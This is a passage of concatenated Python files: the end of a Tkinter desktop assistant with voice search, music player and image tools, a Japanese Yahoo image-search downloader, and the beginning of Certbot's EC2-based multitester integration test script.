if self.radiobtn.get() == 'google' and self.entry1.get() != '':
webbrowser.open('http://google.com/search?q=' + self.entry1.get())
elif self.radiobtn.get() == 'duck' and self.entry1.get() != '':
webbrowser.open('http://duckduckgo.com/?q=' + self.entry1.get())
elif self.radiobtn.get() == 'amz' and self.entry1.get() != '':
webbrowser.open('https://amazon.com/s/?url=search-alias%3Dstripbooks&field-keywords=' + self.entry1.get())
elif self.radiobtn.get() == 'ytb' and self.entry1.get() != '':
webbrowser.open('https://www.youtube.com/results?search_query=' + self.entry1.get())
else:
pass
# bind method for the search entry which works the same as callback, triggered when the user presses the <Enter> key
def get(self,event):
if self.radiobtn.get() == 'google' and self.entry1.get() != '':
webbrowser.open('http://google.com/search?q=' + self.entry1.get())
elif self.radiobtn.get() == 'duck' and self.entry1.get() != '':
webbrowser.open('http://duckduckgo.com/?q=' + self.entry1.get())
elif self.radiobtn.get() == 'amz' and self.entry1.get() != '':
webbrowser.open('https://amazon.com/s/?url=search-alias%3Dstripbooks&field-keywords=' + self.entry1.get())
elif self.radiobtn.get() == 'ytb' and self.entry1.get() != '':
webbrowser.open('https://www.youtube.com/results?search_query=' + self.entry1.get())
else:
speak("please select a search engine sir")
# method for speech_recognition and provide appropriate results
def listenvoice(self):
self.MyButton6.config(state=DISABLED)
try:
mixer.music.load('chime1.mp3')
mixer.music.play()
t=threading.Thread(target=self.performinthread)
t.daemon=True
t.start()
except:
self.MyButton6.config(state=NORMAL)
def performinthread(self):
query = myCommand()
if query != "" and query != None:
query = query.lower()
self.entry1.focus()
self.entry1.delete(0, END)
self.entry1.insert(0, query)
# open content on web browser based on speech recognition
if 'open youtube' in query:
speak('okay sir')
webbrowser.open('www.youtube.com')
elif 'bye' in query or 'go to sleep' in query or 'shut up' in query:
speak('Goodbye sir , have a nice day')
elif 'open google' in query:
speak('okay')
webbrowser.open('www.google.co.in')
elif 'open gmail' in query:
speak('okay')
webbrowser.open('www.gmail.com')
elif "what\'s up" in query or 'how are you' in query:
stMsgs = ['Just doing my thing!', 'I am fine!', 'Nice!', 'I am nice and full of energy']
speak(random.choice(stMsgs))
elif "jarvis" in query:
query = query[7:]
try:
try:
res = client.query(query)
results = next(res.results).text
self.jarvistext.insert(END, results + "\n")
speak('Got it.')
speak(results)
except:
# search on wikipedia
results = wikipedia.summary(query, sentences=2)
self.jarvistext.insert(END, results + "\n")
speak('Got it.')
speak('WIKIPEDIA says - ')
speak(results)
except:
speak('may be you should google it sir')
webbrowser.open('www.google.com')
# get the selected radiobutton
elif self.radiobtn.get() == 'google':
webbrowser.open('http://google.com/search?q=' + query)
elif self.radiobtn.get() == 'duck':
webbrowser.open('http://duckduckgo.com/?q=' + query)
elif self.radiobtn.get() == 'amz':
webbrowser.open('https://amazon.com/s/?url=search-alias%3Dstripbooks&field-keywords=' + query)
elif self.radiobtn.get() == 'ytb':
webbrowser.open('https://www.youtube.com/results?search_query=' + query)
else:
speak("pardon me sir!")
self.MyButton6.config(state=NORMAL)
# pack widgets on screen
def packwidgets(self):
self.label1.grid(row=0, column=0, sticky='W', padx="10")
self.entry1.grid(row=0, column=1, padx="10", columnspan=4)
self.MyButton6.grid(row=0, column=5)
self.MyButton1.grid(row=0, column=6, padx="10")
self.row7.pack(fill="x", pady="20")
self.row8.pack(fill="x")
self.MyButton2.grid(row=0, column=0, sticky=N, padx="10")
self.MyButton3.grid(row=0, column=1, sticky=N, padx="10")
self.MyButton4.grid(row=0, column=2, padx="10")
self.MyButton5.grid(row=0, column=3, sticky=N, padx="10")
self.row9.pack(pady="10")
self.mylabel.pack()
self.jarvistext.pack(expand="no", padx="10")
class MusicPlayer:
def __init__(self,tabControl):
# add tab
self.tab6 = ttk.Frame(tabControl)
tabControl.add(self.tab6, text="Music")
self.statusbar = ttk.Label(self.tab6, text="Welcome to R.A.STUDIOS", relief=SUNKEN, anchor=W, font='Times 10 italic')
self.playlist = []
# playlist frame
self.leftframe = Frame(self.tab6)
self.playlistlbl = Label(self.leftframe, text="PlayList", font=('courier', 10, 'bold'), fg="red")
self.playlistbox = Listbox(self.leftframe)
# variable to store absolute location of file
self.filename_path = None
# playlist - contains the full path + filename
# playlistbox - contains just the filename
# Fullpath + filename is required to play the music inside play_music load function
self.addBtn = ttk.Button(self.leftframe, text="+ Add", command=self.browse_file)
self.delBtn = ttk.Button(self.leftframe, text="- Del", command=self.del_song)
# rightframe containing music buttons
self.rightframe = Frame(self.tab6)
# 3 frames in rightframe
self.topframe = Frame(self.rightframe)
self.lengthlabel = ttk.Label(self.topframe, text='Total Length : --:--')
self.currenttimelabel = ttk.Label(self.topframe, text='Current Time : --:--', relief=GROOVE)
# variable to check if music is paused or muted
self.paused = FALSE
self.muted = FALSE
self.middleframe = Frame(self.rightframe)
# play button and photo on it
self.playPhoto = PhotoImage(file='images/play.png')
self.playBtn = ttk.Button(self.middleframe, image=self.playPhoto, command=self.play_music)
# stop button and its photo
self.stopPhoto = PhotoImage(file='images/stop.png')
self.stopBtn = ttk.Button(self.middleframe, image=self.stopPhoto, command=self.stop_music)
# pause button and its photo
self.pausePhoto = PhotoImage(file='images/pause.png')
self.pauseBtn = ttk.Button(self.middleframe, image=self.pausePhoto, command=self.pause_music)
# Bottom Frame for volume, rewind, mute etc.
self.bottomframe = Frame(self.rightframe)
# rewind button and its photo
self.rewindPhoto = PhotoImage(file='images/rewind.png')
self.rewindBtn = ttk.Button(self.bottomframe, image=self.rewindPhoto, command=self.rewind_music)
# mute button and its photo
self.mutePhoto = PhotoImage(file='images/mute.png')
self.volumePhoto = PhotoImage(file='images/volume.png')
self.volumeBtn = ttk.Button(self.bottomframe, image=self.volumePhoto, command=self.mute_music)
# scale to set volume of song
self.scale = ttk.Scale(self.bottomframe, from_=0, to=100, orient=HORIZONTAL, command=self.set_vol)
# set properties of widgets
def set(self):
# read user's saved playlist
with open('myplaylist.txt', 'r') as pl:
for filename in pl.readlines():
self.filename_path = filename[:-1]
self.add_to_playlist(filename[:-1])
pl.close()
self.scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
# pack widgets to screen
def packwidgets(self):
self.statusbar.pack(side=BOTTOM, fill=X)
self.leftframe.pack(side=LEFT, padx=20)
self.playlistlbl.pack(side=TOP)
self.playlistbox.pack()
self.addBtn.pack(side=LEFT)
self.delBtn.pack(side=LEFT)
self.rightframe.pack(side=RIGHT, padx=10, pady=20)
self.topframe.pack()
self.lengthlabel.pack(pady=5)
self.currenttimelabel.pack()
self.middleframe.pack(pady=30, padx=20)
self.playBtn.grid(row=0, column=0, padx=5)
self.stopBtn.grid(row=0, column=1, padx=5)
self.pauseBtn.grid(row=0, column=2, padx=5)
self.bottomframe.pack()
self.rewindBtn.grid(row=0, column=0)
self.volumeBtn.grid(row=0, column=1)
self.scale.grid(row=0, column=2, pady=15, padx=30)
# browse file to add to playlist
def browse_file(self):
self.filename_path = askopenfilename()
self.add_to_playlist(self.filename_path)
# add file to playlist
with open('myplaylist.txt', 'a') as pl:
pl.write(self.filename_path + '\n')
pl.close()
mixer.music.queue(self.filename_path)
# add song to playlist listbox
def add_to_playlist(self,filename):
filename = os.path.basename(filename)
index = 0
self.playlistbox.insert(index, filename)
self.playlist.insert(index, self.filename_path)
index += 1
# delete selected song from playlist
def del_song(self):
selected_song = self.playlistbox.curselection()
if len(selected_song) != 0:
selected_song = int(selected_song[0])
self.playlistbox.delete(selected_song)
self.playlist.pop(selected_song)
else:
showerror("error", "no song selected")
# show info about song
def show_details(self,play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
# div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
self.lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=self.start_count, args=(total_length,))
t1.start()
# start counting length of song
def start_count(self,t):
# mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
# Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
if self.paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
self.currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
sleep(1)
current_time += 1
# play music
def play_music(self):
if self.paused:
mixer.music.unpause()
self.statusbar['text'] = "Music Resumed"
self.paused = FALSE
else:
try:
self.stop_music()
sleep(1)
selected_song = self.playlistbox.curselection()
selected_song = int(selected_song[0])
play_it =self. playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
self.statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
self.show_details(play_it)
except Exception as e:
print(e)
showerror('File not found', 'could not find the file. Please check again.')
# stop music
def stop_music(self):
mixer.music.stop()
self.statusbar['text'] = "Music Stopped"
# pause music
def pause_music(self):
self.paused = TRUE
mixer.music.pause()
self.statusbar['text'] = "Music Paused"
# rewind music
def rewind_music(self):
self.play_music()
self.statusbar['text'] = "Music Rewinded"
# set volume of music
def set_vol(self,val):
volume = float(val) / 100
mixer.music.set_volume(volume)
# set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
# mute music
def mute_music(self):
if self.muted: # Unmute the music
mixer.music.set_volume(0.7)
self.volumeBtn.configure(image=self.volumePhoto)
self.scale.set(70)
self.muted = FALSE
else: # mute the music
mixer.music.set_volume(0)
self.volumeBtn.configure(image=self.mutePhoto)
self.scale.set(0)
self.muted = TRUE
# class to perform operations on images
class ImageAnalyze:
def __init__(self,tabControl):
# add tab
self.tab7 = ttk.Frame(tabControl)
tabControl.add(self.tab7, text="Images")
# panelA for loading image and PanelB for showing result image
self.panelA = None
self.panelB = None
# cv2 image
self.image = None
# absolute path of image
self.path = None
# saveimage type
self.saveimg = None
# image name and location
self.imgname = None
# response object to download images from web
self.response = google_images_download.googleimagesdownload()
# frame containing buttons to perform operations on images
self.row10 = Frame(self.tab7)
self.btn = Button(self.row10, text="Select an image", command=lambda m="Select an image": self.image_perform(m))
self.btn1 = Button(self.row10, text="Blur image", command=lambda m="Blur image": self.image_perform(m))
self.btn2 = Button(self.row10, text="Detect Edges", command=lambda m="Detect Edges": self.image_perform(m))
self.btn3 = Button(self.row10, text="Save image to desktop", command=lambda m="Save image to desktop": self.image_perform(m))
self.btn4 = Button(self.row10, text="Transposed image", command=lambda m="Transposed image": self.image_perform(m))
self.btn5 = Button(self.row10, text="Resize image", command=lambda m="Resize image": self.image_perform(m))
self.btn6 = Button(self.row10, text="Create Thumbnail", command=lambda m="Create Thumbnail": self.image_perform(m))
self.btn7=Button(self.row10, text="Extract Text", command=lambda m="Extract Text": self.image_perform(m))
# set width and height of image for resizing and creating thumbnail
self.row11 = Frame(self.tab7)
self.lblw = Label(self.row11, text='width')
self.lblh = Label(self.row11, text='height')
self.widthvar = StringVar()
self.widthent = Entry(self.row11, textvariable=self.widthvar, width=8)
self.heighthvar = StringVar()
self.heightent = Entry(self.row11, textvariable=self.heighthvar, width=8)
# frame containing image download entry to accept search query to download related images
self.row12 = Frame(self.tab7)
self.lbldownload = Label(self.row12, text='Search for images to download')
self.downloadimg = StringVar()
self.imgentry = Entry(self.row12, textvariable=self.downloadimg)
# bind method to download image on pressing <Enter>
self.imgentry.bind("<Return>",self.downloadimages)
# image to text
self.imgtotxtvar=StringVar()
self.imgtotxtent=Entry(self.row12,textvariable=self.imgtotxtvar)
self.largeimg=None
self.flag=0
self.newwin=None
# show full size image on label click
def showlargeimg(self,event):
if self.largeimg!=None and self.flag==0:
self.newwin = Toplevel(root)
self.newwin.geometry(str(self.wd)+"x"+str(self.ht)+"+100+5")
self.flag=1
self.newwin.protocol("WM_DELETE_WINDOW", self.winclose)
canv = Canvas(self.newwin, relief=SUNKEN)
sbarV = Scrollbar(self.newwin, orient=VERTICAL)
sbarH = Scrollbar(self.newwin, orient=HORIZONTAL)
sbarV.config(command=canv.yview)
sbarH.config(command=canv.xview)
canv.config(width=400, height=200)
# canv.config(scrollregion=(0,0,1000, 1000))
# canv.configure(scrollregion=canv.bbox('all'))
canv.config(highlightthickness=0)
canv.config(yscrollcommand=sbarV.set)
canv.config(xscrollcommand=sbarH.set)
sbarV.pack(side=RIGHT, fill=Y)
sbarH.pack(side=BOTTOM, fill=X)
canv.pack(side=LEFT, expand=YES, fill=BOTH)
width, height = self.wd,self.ht
canv.config(scrollregion=(0, 0, width, height))
self.imgtag = canv.create_image(0, 0, anchor="nw", image=self.largeimg)
def winclose(self):
self.flag = 0
self.newwin.destroy()
# set properties of widgets
def set(self):
self.lblw.config(font=('times', 15, 'bold'))
self.lblh.config(font=('times', 15, 'bold'))
self.widthent.config(bd=5)
self.row11.columnconfigure(0, weight=1)
self.row11.columnconfigure(1, weight=1)
self.heightent.config(bd=5)
self.lbldownload.config(font=('times', 11, 'bold'))
self.imgentry.config(font=('times', 12), bd=10, width=30)
self.imgtotxtvar.set("Text from image if any")
self.imgtotxtent.config(font=('times', 11), width=50)
# pack widgets on screen
def packwidgets(self):
self.row11.pack()
self.lblw.grid(row=0, column=0, sticky="w", padx="10")
self.lblh.grid(row=0, column=1, sticky="e", padx="10")
self.widthent.grid(row=1, column=0, sticky="w", padx="10", pady="5")
self.heightent.grid(row=1, column=1, sticky="e", padx="10", pady="5")
self.row10.pack(side="bottom", fill="x")
self.btn3.grid(row=1, column=0, pady="10", padx="30")
self.btn4.grid(row=1, column=1, pady="10", padx="30")
self.btn2.grid(row=1, column=2, pady="10", padx="30")
self.btn1.grid(row=2, column=0, pady="10", padx="30")
self.btn.grid(row=2, column=1, pady="10", padx="30")
self.btn5.grid(row=2, column=2, pady="10", padx="30")
self.btn6.grid(row=3, column=0, pady="10", padx="30")
self.btn7.grid(row=3, column=1, pady="10", padx="30")
self.row12.pack(side="bottom", fill="x")
self.lbldownload.grid(row=0, column=0, padx="10")
self.imgentry.grid(row=0, column=1, padx="5")
self.imgtotxtent.grid(row=1,columnspan=3,padx="10")
# method for downloading images from web
def downloadimages(self,event):
if self.downloadimg.get() == "":
showerror("error", "please provide a search query in input")
else:
arguments = {"keywords": self.downloadimg.get(),
"format": "jpg",
"limit": 4,
"print_urls": True,
"size": "medium",
"aspect_ratio": "panoramic",
"output_directory": r"C:\Users\hp\Desktop\mynewimages",
"safe_search": True,
"help": True
}
try:
self.response.download(arguments)
self.downloadimg.set("")
# Handling File NotFound Error
except FileNotFoundError:
arguments = {"keywords": self.downloadimg.get(),
"format": "jpg",
"limit": 1,
"print_urls": True,
"size": "medium"}
# Providing arguments for the searched query
try:
# Downloading the photos based
# on the given arguments
self.response.download(arguments)
except:
pass
# set image properties
def set_img_prop(self,imagename, svimg, method):
self.resultimg(svimg, method)
self.imgname = imagename
self.saveimg = svimg
# get result image converted into tkimage and displayed in panelB
def resultimg(self,img, method="Y"):
avgi = img
if method == "Y":
avgi = Image.fromarray(img)
avgi = ImageTk.PhotoImage(avgi)
if self.panelB is None:
self.panelB = Label(self.tab7, image=avgi,width=200,height=250)
self.panelB.image = avgi
self.panelB.pack(side="right", padx=10)
else:
# update the panels
self.panelB.configure(image=avgi)
self.panelB.image = avgi
# method for performing various image manipulation operations
def image_perform(self,method):
if method == "Select an image":
self.path = askopenfilename()
if self.panelB != None:
self.panelB.config(image="")
if self.panelA != None:
self.panelA.config(image="")
if self.newwin!=None:
self.flag=0
self.newwin.destroy()
try:
if len(self.path) > 0:
# load the image from disk
self.image = cv2.imread(self.path)
# OpenCV represents images in BGR order; however PIL represents
# images in RGB order, so we need to swap the channels
self.image = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
# convert the images to PIL format...
self.image = Image.fromarray(self.image)
self.largeimg=self.image
self.wd,self.ht=self.image.size
self.largeimg = ImageTk.PhotoImage(self.largeimg)
# ...and then to ImageTk format
self.image = ImageTk.PhotoImage(self.image)
if self.panelA is None:
# the first panel will store our original image
self.panelA = Label(self.tab7, image=self.image,width=200,height=250)
self.panelA.image = self.image
self.panelA.bind('<Button-1>', self.showlargeimg)
self.panelA.pack(side="left", padx=10)
else:
# update the panels
self.panelA.configure(image=self.image)
self.panelA.image = self.image
except:
showwarning("invalid image format", "please select a valid image")
else:
if self.panelA != None and len(self.path) > 0:
self.image = cv2.imread(self.path)
# convert from bgr to rgb
avging = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
if method == "Blur image":
avging = cv2.blur(avging, (10, 10))
self.set_img_prop("blur_img", avging, "Y")
self.saveimg = Image.fromarray(avging)
elif method == "Detect Edges":
gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)
# convert to gray scale image
edged = cv2.Canny(gray, 50, 100)
self.set_img_prop("detect_edges_img", edged, "Y")
self.saveimg = Image.fromarray(edged)
elif method == "Transposed image":
# convert cv2 to PIL image object
transposed_img = Image.fromarray(avging)
transposed_img = transposed_img.transpose(Image.FLIP_LEFT_RIGHT)
self.set_img_prop("transposed_img", transposed_img, "N")
elif method == "Save image to desktop":
if self.saveimg != None:
print("yes")
self.saveimg.save("C:\\Users\\hp\\Desktop\\" + self.imgname + ".jpg")
showinfo("message", "image saved succesfully")
else:
showerror("error", "no changes made to original image")
elif method == "Resize image":
if self.heighthvar.get() == "" or self.widthvar.get() == "":
showinfo("message", "Please specify height and width in pixels")
else:
width, height = int(self.widthvar.get()), int(self.heighthvar.get())
resize_img = Image.fromarray(avging)
resize_img = resize_img.resize((width, height))
self.set_img_prop("resized_image" + self.widthvar.get() + "x" + self.heighthvar.get(), resize_img, "N")
elif method == "Create Thumbnail":
if self.heighthvar.get() == "" or self.widthvar.get() == "":
showinfo("message", "Please specify height and width in pixels")
else:
width, height = int(self.widthvar.get()), int(self.heighthvar.get())
thumbnail_img = Image.fromarray(avging)
thumbnail_img.thumbnail((width, height))
self.imgname = "thumbnail_image" + self.widthvar.get() + "x" + self.heighthvar.get()
self.saveimg = thumbnail_img
showinfo("message", "Thumbnail created successfully")
elif method == "Extract Text":
# convert the image to PIL image and further convert it to gray scale image
txtimg=Image.fromarray(avging).convert('L')
pytesseract.pytesseract.tesseract_cmd = 'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'
imgtext = pytesseract.image_to_string(txtimg)
self.imgtotxtvar.set(imgtext)
else:
showwarning("invalid image format", "please select a valid image")
#create root window variable
root=Tk()
# object for root window
windw=Window(root)
# object for homepage tab
home=Homepage(windw.tabControl)
home.set()
home.packwidgets()
#object for dictionary tab
dictionary=Dictionary(windw.tabControl)
dictionary.set()
dictionary.packwidgets()
# object for translate tab
translatetext=TranslateText(windw.tabControl)
translatetext.set()
translatetext.packwidgets()
# object for bookstore tab
bookstore=BookStore(windw.tabControl)
bookstore.packwidgets()
# object for voice assistant tab
mixer.init()
voiceassistant=VoiceAssistant(windw.tabControl)
voiceassistant.packwidgets()
# object for music player
musicplayer=MusicPlayer(windw.tabControl)
musicplayer.set()
musicplayer.packwidgets()
def on_closing():
musicplayer.stop_music()
home.f=1
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
# object for imageanalyze
imageanalyze=ImageAnalyze(windw.tabControl)
imageanalyze.set()
imageanalyze.packwidgets()
# set window on top
root.wm_attributes('-topmost', 1)
#run root window
root.mainloop()
|
exsample.py
|
# -*- coding: utf-8 -*-
from concurrent.futures import ThreadPoolExecutor, as_completed
from io import BytesIO
import os
from pathlib import Path
from threading import Thread
from time import sleep
# boilerplate imports
import urllib  # for URL encoding
import bs4  # HTML parsing
import requests  # URL access
import re  # regular expressions (URL extraction)
import tkinter as tk  # GUI
# import ui  # GUI building
class MyFrame(tk.Frame):
def __init__(self, root):
super().__init__(root)
self.pack()
# display the logo(?)
# image1 = tk.PhotoImage(file = 'LOGO.gif')
# tk.Label(frame1, image = image1).pack()#.grid(row=0, column=0)
# * create the text box for the search keyword
self.key_word = tk.StringVar(value='草')
self.txt_key_word = tk.Entry(self, textvariable=self.key_word)
self.txt_key_word.pack()
# create the search button
serch = tk.Button(self, text='探す', padx=45, pady=7, command=self.search)
serch.pack()
# spacer
tk.Label(self, text="").pack()
# create the settings button
option = tk.Button(self, text='設定', padx=44, pady=7)  # padx is slightly off because of manual fine-tuning
option.pack()
# spacer
tk.Label(self, text="").pack()
# bug / feature request contact
bug = tk.Button(self, text="バグ・要望等連絡", padx=15, pady=7)
bug.pack()
# spacer
tk.Label(self, text="").pack()
# create the quit button
owa = tk.Button(self, text="終了", padx=46, pady=7, command=self.owari)
owa.pack()
def search(self):
search_word = self.key_word.get()
# * spawn a thread and call start so the UI does not block.
t = Thread(target=hack, args=(search_word,))
t.start()
def owari(self):
quit()
class DownLoader(object):
def __init__(self):
# convert from milliseconds to seconds
self.interval = 500 / 1000
# sec
self.timeout = 10
self.download_dir = Path('download')
self.download_dir.mkdir(exist_ok=True)
def get(self, url: str, params: dict=None):
# the actual request is made here
res = requests.get(url, params=params, timeout=self.timeout)
print(res.url)
# raise an exception if the HTTP status code is not in the 200 range.
# specifying a non-existent web page as the url raises an exception, which makes failures easy to spot.
res.raise_for_status()
return res
def get_content(self, url: str, params: dict=None):
sleep(self.interval)
res = self.get(url, params)
return BytesIO(res.content), res.headers['content-type']
def request(self, url_list: list) ->None:
"""
internet -- (Get) --> local
use ThreadPoolExecutor
"""
count = 0
with ThreadPoolExecutor() as executor:
future_to_url = {executor.submit(self.get_content, url): url for url in url_list}
for future in as_completed(future_to_url):
url = future_to_url[future]
try:
# the return value of get_content is retrieved here
buffer, content_type = future.result()
# check whether this content type should be saved.
if not self.save_content_type(content_type):
continue
# the file name for saving is taken directly from the path part of the URL
# duplicates can occur, so add sequential numbers or similar if you need to handle them.
file_name = self.download_dir / os.path.basename(url)
print(content_type, file_name)
# save
self.save_file(buffer, file_name)
count += 1
except Exception as ex:
print(f"url:{url}, {ex}")
if count == 0:
print(f'save file Empty')
def save_content_type(self, content_type: str) ->bool:
is_saved = ["image/jpeg", "image/png", "image/gif"]
return content_type.lower() in is_saved
def save_file(self, buffer: BytesIO, file_name: Path) ->None:
with file_name.open('wb') as f:
f.write(buffer.getvalue())
# * create an instance of the DownLoader class
dl = DownLoader()
# download (HTML) helper function
def hack(search_word: str):  # extract image URLs (parsing) from the page fetched for the search word; library used: bs4
url = 'https://search.yahoo.co.jp/image/search'
params = {'n': '60', 'p': search_word, 'search.x': '1'}
res = dl.get(url, params)
print(res.text)
soup = bs4.BeautifulSoup(res.text, "html.parser")  # parse the HTML (not fully understood)
elems = soup.select('a')  # select the <a> tags
url_list = []  # list that stores the URLs
for img in elems:  # collect the URLs
url_list.append(img.get('href'))
#print (url_list)
print(url_list)
kazu = len(url_list)  # number of URLs, used for the check below
#print (kazu)
if kazu == 0:  # report an error when the number of URLs is 0.
error = "urlzeroerror"
# * return immediately to reduce nesting of the if statement
return
tdo = url_list
# * remove duplicates from the list
url_list = list(set(url_list))
# * request everything in url_list!
dl.request(url_list)
def main() ->None:
root = tk.Tk()
# set the window title
root.title("フリー画像ダウンローダ -ver1.0_beta")
# set the window size
root.geometry("800x500")
f = MyFrame(root)
root.mainloop()
if __name__ == '__main__':
main()
|
multitester.py
|
"""
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_letsencrypt_auto_venv_only.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
import botocore.exceptions
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/credentials)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script to deploy and run')
#parser.add_argument('--script_args',
# nargs='+',
# help='space-delimited list of arguments to pass to the bash test script',
# required=False)
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
parser.add_argument('--fast',
action='store_true',
help="use larger instance types to run faster (saves about a minute, probably not worth it)")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-5f490b35' # premade shared boulder AMI 14.04LTS us-east-1
LOGDIR = "" #points to logging / working directory
# boto3/AWS api globals
AWS_SESSION = None
EC2 = None
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def make_security_group():
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = EC2.create_security_group(GroupName="letsencrypt_test",
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(instance_name,
ami_id,
keyname,
machine_type='t2.micro',
security_groups=['letsencrypt_test'],
userdata=""): #userdata contains bash or cloud-init script
new_instance = EC2.create_instances(
ImageId=ami_id,
SecurityGroups=security_groups,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type)[0]
# brief pause to prevent rare error on EC2 delay, should block until ready instead
time.sleep(1.0)
# give instance a name
try:
new_instance.create_tags(Tags=[{'Key': 'Name', 'Value': instance_name}])
except botocore.exceptions.ClientError as e:
if "InvalidInstanceID.NotFound" in str(e):
# This seems to be ephemeral... retry
time.sleep(1)
new_instance.create_tags(Tags=[{'Key': 'Name', 'Value': instance_name}])
else:
raise
return new_instance
def terminate_and_clean(instances):
"""
Some AMIs specify EBS stores that won't delete on instance termination.
These must be manually deleted after shutdown.
"""
volumes_to_delete = []
for instance in instances:
for bdmap in instance.block_device_mappings:
if 'Ebs' in bdmap.keys():
if not bdmap['Ebs']['DeleteOnTermination']:
volumes_to_delete.append(bdmap['Ebs']['VolumeId'])
for instance in instances:
instance.terminate()
# can't delete volumes until all attaching instances are terminated
_ids = [instance.id for instance in instances]
all_terminated = False
while not all_terminated:
all_terminated = True
for _id in _ids:
# necessary to reinit object for boto3 to get true state
inst = EC2.Instance(id=_id)
if inst.state['Name'] != 'terminated':
all_terminated = False
time.sleep(5)
for vol_id in volumes_to_delete:
volume = EC2.Volume(id=vol_id)
volume.delete()
return volumes_to_delete
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib2.Request(urlstring)
response = urllib2.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib2.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
# the reinstantiation from id is necessary to force boto3
# to correctly update the 'state' variable during init
_id = booting_instance.id
_instance = EC2.Instance(id=_id)
_state = _instance.state['Name']
_ip = _instance.public_ip_address
while _state != 'running' or _ip is None:
time.sleep(wait_time)
